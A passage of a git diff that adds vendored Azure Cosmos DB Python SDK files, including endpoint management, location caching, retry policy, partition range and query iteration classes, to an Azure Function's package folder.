self.refresh_time_interval_in_ms, + ) + self.refresh_needed = False + self.refresh_lock = threading.RLock() + self.last_refresh_time = 0 + + def get_refresh_time_interval_in_ms_stub(self): # pylint: disable=no-self-use + return constants._Constants.DefaultUnavailableLocationExpirationTime + + def get_write_endpoint(self): + return self.location_cache.get_write_endpoint() + + def get_read_endpoint(self): + return self.location_cache.get_read_endpoint() + + def resolve_service_endpoint(self, request): + return self.location_cache.resolve_service_endpoint(request) + + def mark_endpoint_unavailable_for_read(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_read(endpoint) + + def mark_endpoint_unavailable_for_write(self, endpoint): + self.location_cache.mark_endpoint_unavailable_for_write(endpoint) + + def get_ordered_write_endpoints(self): + return self.location_cache.get_ordered_write_endpoints() + + def get_ordered_read_endpoints(self): + return self.location_cache.get_ordered_read_endpoints() + + def can_use_multiple_write_locations(self, request): + return self.location_cache.can_use_multiple_write_locations_for_request(request) + + def force_refresh(self, database_account): + self.refresh_needed = True + self.refresh_endpoint_list(database_account) + + def refresh_endpoint_list(self, database_account, **kwargs): + with self.refresh_lock: + # if refresh is not needed or refresh is already taking place, return + if not self.refresh_needed: + return + try: + self._refresh_endpoint_list_private(database_account, **kwargs) + except Exception as e: + raise e + + def _refresh_endpoint_list_private(self, database_account=None, **kwargs): + if database_account: + self.location_cache.perform_on_database_account_read(database_account) + self.refresh_needed = False + + if ( + self.location_cache.should_refresh_endpoints() + and self.location_cache.current_time_millis() - self.last_refresh_time > self.refresh_time_interval_in_ms + ): + if not database_account: + database_account = self._GetDatabaseAccount(**kwargs) + self.location_cache.perform_on_database_account_read(database_account) + self.last_refresh_time = self.location_cache.current_time_millis() + self.refresh_needed = False + + def _GetDatabaseAccount(self, **kwargs): + """Gets the database account. + + First tries by using the default endpoint, and if that doesn't work, + use the endpoints for the preferred locations in the order they are + specified, to get the database account. + """ + try: + database_account = self._GetDatabaseAccountStub(self.DefaultEndpoint, **kwargs) + return database_account + # If for any reason(non-globaldb related), we are not able to get the database + # account from the above call to GetDatabaseAccount, we would try to get this + # information from any of the preferred locations that the user might have + # specified (by creating a locational endpoint) and keeping eating the exception + # until we get the database account and return None at the end, if we are not able + # to get that info from any endpoints + except exceptions.CosmosHttpResponseError: + for location_name in self.PreferredLocations: + locational_endpoint = _GlobalEndpointManager.GetLocationalEndpoint(self.DefaultEndpoint, location_name) + try: + database_account = self._GetDatabaseAccountStub(locational_endpoint, **kwargs) + return database_account + except exceptions.CosmosHttpResponseError: + pass + + return None + + def _GetDatabaseAccountStub(self, endpoint, **kwargs): + """Stub for getting database account from the client. + + This can be used for mocking purposes as well. + """ + return self.Client.GetDatabaseAccount(endpoint, **kwargs) + + @staticmethod + def GetLocationalEndpoint(default_endpoint, location_name): + # For default_endpoint like 'https://contoso.documents.azure.com:443/' parse it to + # generate URL format. This default_endpoint should be global endpoint(and cannot + # be a locational endpoint) and we agreed to document that + endpoint_url = urlparse(default_endpoint) + + # hostname attribute in endpoint_url will return 'contoso.documents.azure.com' + if endpoint_url.hostname is not None: + hostname_parts = str(endpoint_url.hostname).lower().split(".") + if hostname_parts is not None: + # global_database_account_name will return 'contoso' + global_database_account_name = hostname_parts[0] + + # Prepare the locational_database_account_name as contoso-EastUS for location_name 'East US' + locational_database_account_name = global_database_account_name + "-" + location_name.replace(" ", "") + + # Replace 'contoso' with 'contoso-EastUS' and return locational_endpoint + # as https://contoso-EastUS.documents.azure.com:443/ + locational_endpoint = default_endpoint.lower().replace( + global_database_account_name, locational_database_account_name, 1 + ) + return locational_endpoint + + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_gone_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_gone_retry_policy.py new file mode 100644 index 0000000..23aef98 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_gone_retry_policy.py @@ -0,0 +1,53 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for connection reset retry policy implementation in the Azure +Cosmos database service. +""" + + +# pylint: disable=protected-access + + +class PartitionKeyRangeGoneRetryPolicy(object): + + def __init__(self, client, *args): + self.retry_after_in_milliseconds = 1000 + self.refresh_partition_key_range_cache = True + self.args = args + self.client = client + self.exception = None + + def ShouldRetry(self, exception): + """Returns true if should retry based on the passed-in exception. + + :param (exceptions.CosmosHttpResponseError instance) exception: + :rtype: boolean + + """ + self.exception = exception # needed for pylint + if self.refresh_partition_key_range_cache: + # refresh routing_map_provider to refresh partition key range cache + # make refresh_partition_key_range_cache False to skip this check on subsequent Gone exceptions + self.client.refresh_routing_map_provider() + self.refresh_partition_key_range_cache = False + # return False to raise error to multi_execution_aggregator and repair document producer context + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_location_cache.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_location_cache.py new file mode 100644 index 0000000..91a62b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_location_cache.py @@ -0,0 +1,329 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Implements the abstraction to resolve target location for geo-replicated +DatabaseAccount with multiple writable and readable locations. +""" +import collections +import time + +from . import documents +from . import http_constants + +# pylint: disable=protected-access + + +class EndpointOperationType(object): + NoneType = "None" + ReadType = "Read" + WriteType = "Write" + + +def get_endpoint_by_location(locations): + endpoints_by_location = collections.OrderedDict() + parsed_locations = [] + + for location in locations: + if not location["name"]: + # during fail-over the location name is empty + continue + try: + region_uri = location["databaseAccountEndpoint"] + parsed_locations.append(location["name"]) + endpoints_by_location.update({location["name"]: region_uri}) + except Exception as e: + raise e + + return endpoints_by_location, parsed_locations + + +class LocationCache(object): # pylint: disable=too-many-public-methods,too-many-instance-attributes + def current_time_millis(self): # pylint: disable=no-self-use + return int(round(time.time() * 1000)) + + def __init__( + self, + preferred_locations, + default_endpoint, + enable_endpoint_discovery, + use_multiple_write_locations, + refresh_time_interval_in_ms, + ): + self.preferred_locations = preferred_locations + self.default_endpoint = default_endpoint + self.enable_endpoint_discovery = enable_endpoint_discovery + self.use_multiple_write_locations = use_multiple_write_locations + self.enable_multiple_writable_locations = False + self.write_endpoints = [self.default_endpoint] + self.read_endpoints = [self.default_endpoint] + self.location_unavailability_info_by_endpoint = {} + self.refresh_time_interval_in_ms = refresh_time_interval_in_ms + self.last_cache_update_time_stamp = 0 + self.available_read_endpoint_by_locations = {} + self.available_write_endpoint_by_locations = {} + self.available_write_locations = [] + self.available_read_locations = [] + + def check_and_update_cache(self): + if ( + self.location_unavailability_info_by_endpoint + and self.current_time_millis() - self.last_cache_update_time_stamp > self.refresh_time_interval_in_ms + ): + self.update_location_cache() + + def get_write_endpoints(self): + self.check_and_update_cache() + return self.write_endpoints + + def get_read_endpoints(self): + self.check_and_update_cache() + return self.read_endpoints + + def get_write_endpoint(self): + return self.get_write_endpoints()[0] + + def get_read_endpoint(self): + return self.get_read_endpoints()[0] + + def mark_endpoint_unavailable_for_read(self, endpoint): + self.mark_endpoint_unavailable(endpoint, EndpointOperationType.ReadType) + + def mark_endpoint_unavailable_for_write(self, endpoint): + self.mark_endpoint_unavailable(endpoint, EndpointOperationType.WriteType) + + def perform_on_database_account_read(self, database_account): + self.update_location_cache( + database_account._WritableLocations, + database_account._ReadableLocations, + database_account._EnableMultipleWritableLocations, + ) + + def get_ordered_write_endpoints(self): + return self.available_write_locations + + def get_ordered_read_endpoints(self): + return self.available_read_locations + + def resolve_service_endpoint(self, request): + if request.location_endpoint_to_route: + return request.location_endpoint_to_route + + location_index = int(request.location_index_to_route) if request.location_index_to_route else 0 + use_preferred_locations = ( + request.use_preferred_locations if request.use_preferred_locations is not None else True + ) + + if not use_preferred_locations or ( + documents._OperationType.IsWriteOperation(request.operation_type) + and not self.can_use_multiple_write_locations_for_request(request) + ): + # For non-document resource types in case of client can use multiple write locations + # or when client cannot use multiple write locations, flip-flop between the + # first and the second writable region in DatabaseAccount (for manual failover) + if self.enable_endpoint_discovery and self.available_write_locations: + location_index = min(location_index % 2, len(self.available_write_locations) - 1) + write_location = self.available_write_locations[location_index] + return self.available_write_endpoint_by_locations[write_location] + return self.default_endpoint + + endpoints = ( + self.get_write_endpoints() + if documents._OperationType.IsWriteOperation(request.operation_type) + else self.get_read_endpoints() + ) + return endpoints[location_index % len(endpoints)] + + def should_refresh_endpoints(self): # pylint: disable=too-many-return-statements + most_preferred_location = self.preferred_locations[0] if self.preferred_locations else None + + # we should schedule refresh in background if we are unable to target the user's most preferredLocation. + if self.enable_endpoint_discovery: + + should_refresh = self.use_multiple_write_locations and not self.enable_multiple_writable_locations + + if most_preferred_location: + if self.available_read_endpoint_by_locations: + most_preferred_read_endpoint = self.available_read_endpoint_by_locations[most_preferred_location] + if most_preferred_read_endpoint and most_preferred_read_endpoint != self.read_endpoints[0]: + # For reads, we can always refresh in background as we can alternate to + # other available read endpoints + return True + else: + return True + + if not self.can_use_multiple_write_locations(): + if self.is_endpoint_unavailable(self.write_endpoints[0], EndpointOperationType.WriteType): + # Since most preferred write endpoint is unavailable, we can only refresh in background if + # we have an alternate write endpoint + return True + return should_refresh + if most_preferred_location: + most_preferred_write_endpoint = self.available_write_endpoint_by_locations[most_preferred_location] + if most_preferred_write_endpoint: + should_refresh |= most_preferred_write_endpoint != self.write_endpoints[0] + return should_refresh + return True + return should_refresh + return False + + def clear_stale_endpoint_unavailability_info(self): + new_location_unavailability_info = {} + if self.location_unavailability_info_by_endpoint: + for unavailable_endpoint in self.location_unavailability_info_by_endpoint: + unavailability_info = self.location_unavailability_info_by_endpoint[unavailable_endpoint] + if not ( + unavailability_info + and self.current_time_millis() - unavailability_info["lastUnavailabilityCheckTimeStamp"] + > self.refresh_time_interval_in_ms + ): + new_location_unavailability_info[ + unavailable_endpoint + ] = self.location_unavailability_info_by_endpoint[unavailable_endpoint] + + self.location_unavailability_info_by_endpoint = new_location_unavailability_info + + def is_endpoint_unavailable(self, endpoint, expected_available_operations): + unavailability_info = ( + self.location_unavailability_info_by_endpoint[endpoint] + if endpoint in self.location_unavailability_info_by_endpoint + else None + ) + + if ( + expected_available_operations == EndpointOperationType.NoneType + or not unavailability_info + or expected_available_operations not in unavailability_info["operationType"] + ): + return False + + if ( + self.current_time_millis() - unavailability_info["lastUnavailabilityCheckTimeStamp"] + > self.refresh_time_interval_in_ms + ): + return False + # Unexpired entry present. Endpoint is unavailable + return True + + def mark_endpoint_unavailable(self, unavailable_endpoint, unavailable_operation_type): + unavailablility_info = ( + self.location_unavailability_info_by_endpoint[unavailable_endpoint] + if unavailable_endpoint in self.location_unavailability_info_by_endpoint + else None + ) + current_time = self.current_time_millis() + if not unavailablility_info: + self.location_unavailability_info_by_endpoint[unavailable_endpoint] = { + "lastUnavailabilityCheckTimeStamp": current_time, + "operationType": set([unavailable_operation_type]), + } + else: + unavailable_operations = set([unavailable_operation_type]).union(unavailablility_info["operationType"]) + self.location_unavailability_info_by_endpoint[unavailable_endpoint] = { + "lastUnavailabilityCheckTimeStamp": current_time, + "operationType": unavailable_operations, + } + self.update_location_cache() + + def get_preferred_locations(self): + return self.preferred_locations + + def update_location_cache(self, write_locations=None, read_locations=None, enable_multiple_writable_locations=None): + if enable_multiple_writable_locations: + self.enable_multiple_writable_locations = enable_multiple_writable_locations + + self.clear_stale_endpoint_unavailability_info() + + if self.enable_endpoint_discovery: + if read_locations: + self.available_read_endpoint_by_locations, self.available_read_locations = get_endpoint_by_location( # pylint: disable=line-too-long + read_locations + ) + + if write_locations: + self.available_write_endpoint_by_locations, self.available_write_locations = get_endpoint_by_location( # pylint: disable=line-too-long + write_locations + ) + + self.write_endpoints = self.get_preferred_available_endpoints( + self.available_write_endpoint_by_locations, + self.available_write_locations, + EndpointOperationType.WriteType, + self.default_endpoint, + ) + self.read_endpoints = self.get_preferred_available_endpoints( + self.available_read_endpoint_by_locations, + self.available_read_locations, + EndpointOperationType.ReadType, + self.write_endpoints[0], + ) + self.last_cache_update_timestamp = self.current_time_millis() # pylint: disable=attribute-defined-outside-init + + def get_preferred_available_endpoints( + self, endpoints_by_location, orderedLocations, expected_available_operation, fallback_endpoint + ): + endpoints = [] + # if enableEndpointDiscovery is false, we always use the defaultEndpoint that + # user passed in during documentClient init + if self.enable_endpoint_discovery and endpoints_by_location: # pylint: disable=too-many-nested-blocks + if ( + self.can_use_multiple_write_locations() + or expected_available_operation == EndpointOperationType.ReadType + ): + unavailable_endpoints = [] + if self.preferred_locations: + # When client can not use multiple write locations, preferred locations + # list should only be used determining read endpoints order. If client + # can use multiple write locations, preferred locations list should be + # used for determining both read and write endpoints order. + for location in self.preferred_locations: + endpoint = endpoints_by_location[location] if location in endpoints_by_location else None + if endpoint: + if self.is_endpoint_unavailable(endpoint, expected_available_operation): + unavailable_endpoints.append(endpoint) + else: + endpoints.append(endpoint) + + if not endpoints: + endpoints.append(fallback_endpoint) + + endpoints.extend(unavailable_endpoints) + else: + for location in orderedLocations: + if location and location in endpoints_by_location: + # location is empty during manual failover + endpoints.append(endpoints_by_location[location]) + + if not endpoints: + endpoints.append(fallback_endpoint) + + return endpoints + + def can_use_multiple_write_locations(self): + return self.use_multiple_write_locations and self.enable_multiple_writable_locations + + def can_use_multiple_write_locations_for_request(self, request): + return self.can_use_multiple_write_locations() and ( + request.resource_type == http_constants.ResourceType.Document + or ( + request.resource_type == http_constants.ResourceType.StoredProcedure + and request.operation_type == documents._OperationType.ExecuteJavaScript + ) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_partition.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_partition.py new file mode 100644 index 0000000..1af7b5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_partition.py @@ -0,0 +1,64 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal class for client side partition implementation in the Azure Cosmos +database service. +""" + +from six.moves import xrange + + +class Partition(object): + """A class that holds the hash value and node name for a partition. + """ + + def __init__(self, hash_value=None, node=None): + self.hash_value = hash_value + self.node = node + + def GetNode(self): + """Gets the name of the node(collection) for this object. + """ + return self.node + + def __eq__(self, other): + return (self.hash_value == other.hash_value) and (self.node == other.node) + + def __lt__(self, other): + if self == other: + return False + + return self.CompareTo(other.hash_value) < 0 + + def CompareTo(self, other_hash_value): + """Compare the passed hash value with the hash value of this object. + """ + if len(self.hash_value) != len(other_hash_value): + raise ValueError("Length of hashes doesn't match.") + + # The hash byte array that is returned from ComputeHash method has the MSB at the end of the array + # so comparing the bytes from the end for compare operations. + for i in xrange(0, len(self.hash_value)): + if self.hash_value[len(self.hash_value) - i - 1] < other_hash_value[len(self.hash_value) - i - 1]: + return -1 + if self.hash_value[len(self.hash_value) - i - 1] > other_hash_value[len(self.hash_value) - i - 1]: + return 1 + return 0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_query_iterable.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_query_iterable.py new file mode 100644 index 0000000..44e3778 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_query_iterable.py @@ -0,0 +1,101 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Iterable query results in the Azure Cosmos database service. +""" +from azure.core.paging import PageIterator # type: ignore +from azure.cosmos._execution_context import execution_dispatcher + +# pylint: disable=protected-access + + +class QueryIterable(PageIterator): + """Represents an iterable object of the query results. + + QueryIterable is a wrapper for query execution context. + """ + + def __init__( + self, + client, + query, + options, + fetch_function=None, + collection_link=None, + database_link=None, + partition_key=None, + continuation_token=None, + ): + """Instantiates a QueryIterable for non-client side partitioning queries. + + _ProxyQueryExecutionContext will be used as the internal query execution + context. + + :param CosmosClient client: Instance of document client. + :param (str or dict) query: + :param dict options: The request options for the request. + :param method fetch_function: + :param method resource_type: The type of the resource being queried + :param str resource_link: If this is a Document query/feed collection_link is required. + + Example of `fetch_function`: + + >>> def result_fn(result): + >>> return result['Databases'] + + """ + self._client = client + self.retry_options = client.connection_policy.RetryOptions + self._query = query + self._options = options + if continuation_token: + options['continuation'] = continuation_token + self._fetch_function = fetch_function + self._collection_link = collection_link + self._database_link = database_link + self._partition_key = partition_key + self._ex_context = execution_dispatcher._ProxyQueryExecutionContext( + self._client, self._collection_link, self._query, self._options, self._fetch_function + ) + super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token) + + def _unpack(self, block): + continuation = None + if self._client.last_response_headers: + continuation = self._client.last_response_headers.get("x-ms-continuation") or \ + self._client.last_response_headers.get('etag') + if block: + self._did_a_call_already = False + return continuation, block + + def _fetch_next(self, *args): # pylint: disable=unused-argument + """Return a block of results with respecting retry policy. + + This method only exists for backward compatibility reasons. (Because + QueryIterable has exposed fetch_next_block api). + + :return: List of results. + :rtype: list + """ + block = self._ex_context.fetch_next_block() + if not block: + raise StopIteration + return block diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range.py new file mode 100644 index 0000000..e0aa343 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range.py @@ -0,0 +1,76 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Range class implementation in the Azure Cosmos database service. +""" + + +class Range(object): + """Represents the Range class used to map the partition key of the document + to its associated collection. + """ + + def __init__(self, low, high): + if low is None: + raise ValueError("low is None.") + if high is None: + raise ValueError("high is None.") + if low > high: + raise ValueError("Range low value must be less than or equal the high value.") + + self.low = low + self.high = high + + def __hash__(self): + return hash((self.low, self.high)) + + def __str__(self): + return str(self.low) + str(self.high) + + def __eq__(self, other): + return (self.low == other.low) and (self.high == other.high) + + def __lt__(self, other): + if self == other: + return False + return self.low < other.low or self.high < other.high + + def Contains(self, other): + """Check if the passed parameter is in the range of this object. + """ + if other is None: + raise ValueError("other is None.") + + if isinstance(other, Range): + return other.low >= self.low and other.high <= self.high + return self.Contains(Range(other, other)) + + def Intersect(self, other): + """Check if the passed parameter intersects the range of this object. + """ + if isinstance(other, Range): + max_low = self.low if (self.low >= other.low) else other.low + min_high = self.high if (self.high <= other.high) else other.high + + if max_low <= min_high: + return True + + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range_partition_resolver.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range_partition_resolver.py new file mode 100644 index 0000000..b9c227e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_range_partition_resolver.py @@ -0,0 +1,117 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Range partition resolver implementation in the Azure Cosmos database service. +""" + +from . import _range as prange + + +class RangePartitionResolver(object): + """RangePartitionResolver implements partitioning based on the ranges, + allowing you to distribute requests and data across a number of partitions. + """ + + def __init__(self, partition_key_extractor, partition_map): + """ + :param lambda partition_key_extractor: + Returning the partition key from the document passed. + :param dict partition_map: + The dictionary of ranges mapped to their associated collection + """ + if partition_key_extractor is None: + raise ValueError("partition_key_extractor is None.") + if partition_map is None: + raise ValueError("partition_map is None.") + + self.partition_key_extractor = partition_key_extractor + self.partition_map = partition_map + + def ResolveForCreate(self, document): + """Resolves the collection for creating the document based on the partition key. + + :param dict document: The document to be created. + :return: Collection Self link or Name based link which should handle the Create operation. + :rtype: str + """ + if document is None: + raise ValueError("document is None.") + + partition_key = self.partition_key_extractor(document) + containing_range = self._GetContainingRange(partition_key) + + if containing_range is None: + raise ValueError("A containing range for " + str(partition_key) + " doesn't exist in the partition map.") + + return self.partition_map.get(containing_range) + + def ResolveForRead(self, partition_key): + """Resolves the collection for reading/querying the documents based on the partition key. + + :param dict document: The document to be read/queried. + :return: Collection Self link(s) or Name based link(s) which should handle the Read operation. + :rtype: list + """ + intersecting_ranges = self._GetIntersectingRanges(partition_key) + + collection_links = list() + for keyrange in intersecting_ranges: + collection_links.append(self.partition_map.get(keyrange)) + + return collection_links + + def _GetContainingRange(self, partition_key): + """Get the containing range based on the partition key. + """ + for keyrange in self.partition_map.keys(): + if keyrange.Contains(partition_key): + return keyrange + + return None + + def _GetIntersectingRanges(self, partition_key): + """Get the intersecting ranges based on the partition key. + """ + partitionkey_ranges = set() + intersecting_ranges = set() + + if partition_key is None: + return list(self.partition_map.keys()) + + if isinstance(partition_key, prange.Range): + partitionkey_ranges.add(partition_key) + elif isinstance(partition_key, list): + for key in partition_key: + if key is None: + return list(self.partition_map.keys()) + if isinstance(key, prange.Range): + partitionkey_ranges.add(key) + else: + partitionkey_ranges.add(prange.Range(key, key)) + else: + partitionkey_ranges.add(prange.Range(partition_key, partition_key)) + + for partitionKeyRange in partitionkey_ranges: + for keyrange in self.partition_map.keys(): + if keyrange.Intersect(partitionKeyRange): + intersecting_ranges.add(keyrange) + + return intersecting_ranges diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_request_object.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_request_object.py new file mode 100644 index 0000000..cec4317 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_request_object.py @@ -0,0 +1,49 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Represents a request object. +""" + + +class RequestObject(object): + def __init__(self, resource_type, operation_type, endpoint_override=None): + self.resource_type = resource_type + self.operation_type = operation_type + self.endpoint_override = endpoint_override + self.should_clear_session_token_on_session_read_failure = False + self.use_preferred_locations = None + self.location_index_to_route = None + self.location_endpoint_to_route = None + + def route_to_location_with_preferred_location_flag(self, location_index, use_preferred_locations): + self.location_index_to_route = location_index + self.use_preferred_locations = use_preferred_locations + self.location_endpoint_to_route = None + + def route_to_location(self, location_endpoint): + self.location_index_to_route = None + self.use_preferred_locations = None + self.location_endpoint_to_route = location_endpoint + + def clear_route_to_location(self): + self.location_index_to_route = None + self.use_preferred_locations = None + self.location_endpoint_to_route = None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_resource_throttle_retry_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_resource_throttle_retry_policy.py new file mode 100644 index 0000000..6d9bcc1 --- /dev/null +++ 